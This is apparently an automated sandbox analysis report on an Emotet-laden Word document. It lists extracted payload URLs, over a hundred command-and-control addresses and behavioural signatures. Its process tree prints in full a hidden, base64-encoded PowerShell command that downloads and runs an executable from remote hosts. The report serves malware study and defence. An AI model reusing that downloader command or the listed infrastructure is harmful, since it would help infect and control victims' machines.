Analysis
-
max time kernel
24s -
resource
win10v191014 -
submitted
25-12-2019 07:02
General
Malware Config
Extracted
http://joaoleobarbieri.adv.br/test/l4d6638v6l-fotnu5m-867027278/
http://kaplanforklift.com/web_map/PmTuIEQ/
http://londontravel.com.ar/brc/HsGpuPR/
https://leavenworthrental.com/calendar/aoo-ue7-653740/
http://lareserva.com.py/aloja/AOISroJmq/
Extracted
emotet
85.100.122.211:80
78.189.165.52:8080
88.248.140.80:80
45.79.75.232:8080
124.150.175.133:80
164.68.115.146:8080
5.189.148.98:8080
96.234.38.186:8080
178.134.1.238:80
212.129.14.27:8080
78.186.102.195:80
66.229.161.86:443
190.17.94.108:443
91.117.31.181:80
119.57.36.54:8080
37.59.24.25:8080
200.41.121.69:443
217.181.139.237:443
86.70.224.211:80
216.75.37.196:8080
182.176.116.139:995
138.197.140.163:8080
187.250.92.82:80
82.146.55.23:7080
92.16.222.156:80
91.117.131.122:80
58.185.224.18:80
189.225.211.171:443
201.196.15.79:990
72.27.212.209:8080
100.38.11.243:80
190.161.67.63:80
128.92.54.20:80
158.69.167.246:8080
181.46.176.38:80
176.58.93.123:80
105.209.235.113:8080
67.254.196.78:443
190.47.236.83:80
192.210.217.94:8080
192.241.220.183:8080
191.100.24.201:50000
41.190.148.90:80
46.105.128.215:8080
185.192.75.240:443
172.104.70.207:8080
190.171.135.235:80
46.105.131.68:8080
72.51.153.27:80
221.154.59.110:80
86.98.157.3:80
195.250.143.182:80
88.247.26.78:80
95.216.207.86:7080
193.33.38.208:443
181.167.35.84:80
110.2.118.164:80
110.142.161.90:80
124.150.175.129:8080
37.46.129.215:8080
139.59.12.63:8080
81.82.247.216:80
197.94.32.129:8080
175.127.140.68:80
115.179.91.58:80
190.247.9.40:443
87.9.181.247:80
85.109.190.235:443
192.161.190.171:8080
24.27.122.202:80
177.144.130.105:443
108.184.9.44:80
86.6.123.109:80
210.111.160.220:80
190.93.210.113:80
162.144.46.90:8080
58.93.151.148:80
95.9.217.200:8080
98.15.140.226:80
113.52.135.33:7080
41.111.190.94:80
51.38.134.203:8080
37.70.131.107:80
190.171.153.139:80
98.178.241.106:80
186.177.174.163:80
211.48.165.9:443
154.120.227.190:443
203.160.173.202:80
177.103.240.93:80
175.103.239.50:80
179.5.118.12:8080
85.235.219.74:80
83.156.88.159:80
46.17.6.116:8080
142.93.87.198:8080
41.77.74.214:443
95.255.140.89:443
212.112.113.235:80
188.230.134.205:80
217.12.70.226:80
181.53.29.136:8080
95.216.212.157:8080
165.100.148.200:8080
156.155.163.232:80
190.101.87.170:80
189.61.200.9:443
201.183.251.100:80
186.84.173.136:8080
190.38.252.45:443
190.5.162.204:80
69.14.208.221:80
203.153.216.178:7080
24.28.178.71:80
94.203.236.122:80
200.71.112.158:53
185.244.167.25:443
210.224.65.117:80
211.42.204.154:80
89.215.225.15:80
42.51.192.231:8080
95.130.37.244:443
220.78.29.88:80
174.57.150.13:8080
82.79.244.92:80
211.218.105.101:80
112.186.195.176:80
Signatures
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXE973.exe973.exepid process 4924 WINWORD.EXE 4672 973.exe 4740 973.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 4924 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3748 5040 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid process 3748 Powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
Powershell.exe973.exedescription pid process target process PID 3748 wrote to memory of 4672 3748 Powershell.exe 973.exe PID 4672 wrote to memory of 4740 4672 973.exe 973.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4924 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 3748 Powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
973.exe973.exepid process 4672 973.exe 4740 973.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
Processes:
973.exepid process 4740 973.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description ioc Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1ce640215c5dfbfe305436b07a2a63072fc67e9e1dc18377d03240397cc8d2d4.doc" /o ""1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: AddClipboardFormatListener
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABPAGYAaAByAGYAYgBwAHgAcQA9ACcASABnAGEAZgBnAGoAagB6ACcAOwAkAE8AYQB4AGwAdQBsAHYAeABsAHcAZABsACAAPQAgACcAOQA3ADMAJwA7ACQARgBwAGkAbQByAHgAYQBxAGUAPQAnAFEAYwB2AHcAbgBnAGoAZAByAGsAdwBsACcAOwAkAE0AdQBtAG0AaQB3AGQAdwByAGIAZQBmAGwAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAE8AYQB4AGwAdQBsAHYAeABsAHcAZABsACsAJwAuAGUAeABlACcAOwAkAFUAcgBmAG0AdABtAGoAdgBqAD0AJwBKAHMAawBzAHcAegB3AHAAbQBxAHkAawAnADsAJABIAGUAbwBtAGUAdwBsAHoAdgA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAFQALgBXAGUAQgBDAGwAaQBlAE4AVAA7ACQAVQBoAGkAdABkAG8AagBrAGMAPQAnAGgAdAB0AHAAOgAvAC8AagBvAGEAbwBsAGUAbwBiAGEAcgBiAGkAZQByAGkALgBhAGQAdgAuAGIAcgAvAHQAZQBzAHQALwBsADQAZAA2ADYAMwA4AHYANgBsAC0AZgBvAHQAbgB1ADUAbQAtADgANgA3ADAAMgA3ADIANwA4AC8AKgBoAHQAdABwADoALwAvAGsAYQBwAGwAYQBuAGYAbwByAGsAbABpAGYAdAAuAGMAbwBtAC8AdwBlAGIAXwBtAGEAcAAvAFAAbQBUAHUASQBFAFEALwAqAGgAdAB0AHAAOgAvAC8AbABvAG4AZABvAG4AdAByAGEAdgBlAGwALgBjAG8AbQAuAGEAcgAvAGIAcgBjAC8ASABzAEcAcAB1AFAAUgAvACoAaAB0AHQAcABzADoALwAvAGwAZQBhAHYAZQBuAHcAbwByAHQAaAByAGUAbgB0AGEAbAAuAGMAbwBtAC8AYwBhAGwAZQBuAGQAYQByAC8AYQBvAG8ALQB1AGUANwAtADYANQAzADcANAAwAC8AKgBoAHQAdABwADoALwAvAGwAYQByAGUAcwBlAHIAdgBhAC4AYwBvAG0ALgBwAHkALwBhAGwAbwBqAGEALwBBAE8ASQBTAHIAbwBKAG0AcQAvACcALgAiAFMAcABsAGAAaQB0ACIAKAAnACoAJwApADsAJABEAHEAdwB0AHUAaQBlAHYAaAB4AGYAdgBkAD0AJwBMAHUAcwB1AGUAZQBuAHkAawB1AGsAYQB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABLAGMAcgBoAGsAcAB2AGsAcgB5AGYAYwBhACAAaQBuACAAJABVAGgAaQB0AGQAbwBqAGsAYwApAHsAdAByAHkAewAkAEgAZQBvAG0AZQB3AGwAegB2AC4AIgBkAGAAbwBXAG4AbABvAGAAQQBgAEQARgBpAGwAZQAiACgAJABLAGMAcgBoAGsAcAB2AGsAcgB5AGYAYwBhACwAIAAkAE0AdQBtAG0AaQB3AGQAdwByAGIAZQBmAGwAKQA7ACQAVwBoAHcAcQBxAHYAbgBjAG8AcwBvAD0AJwBOAG0AYgB3AGwAcQBiAHYAZgBwACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQATQB1AG0AbQBpAHcAZAB3AHIAYgBlAGYAbAApAC4AIgBMAGAARQBuAEcAVABIACIAIAAtAGcAZQAgADIANAAyADUAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAQQBgAFIAVAAiACgAJABNAHUAbQBtAGkAdwBkAHcAcgBiAGUAZgBsACkAOwAkAFIAbAB5AGoAaQBpAHYAcgBhAHgAegA9ACcAQwB5AHIAZABjAHEAcgBjAGwAeAB0AG8AJwA7AGIAcgBlAGEAawA7ACQAWQB0AHEAcwBxAHoAYQBlAGIAPQAnAEoAZgBzAHQAbQBvAGMAaQByACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEQAYgBtAHAAYQBuAGYAbgA9ACcAVABkAHcAeQBrAGYAaQBvAHQAeAB3AG4AJwA=1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\973.exe"C:\Users\Admin\973.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
-
C:\Users\Admin\973.exe--6e477d33⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\973.exe
-
C:\Users\Admin\973.exe
-
C:\Users\Admin\973.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438
-
memory/4672-10-0x00000000006D0000-0x00000000006E7000-memory.dmpFilesize
92KB
-
memory/4740-13-0x00000000007E0000-0x00000000007F7000-memory.dmpFilesize
92KB
-
memory/4740-14-0x0000000000400000-0x00000000004AA000-memory.dmpFilesize
680KB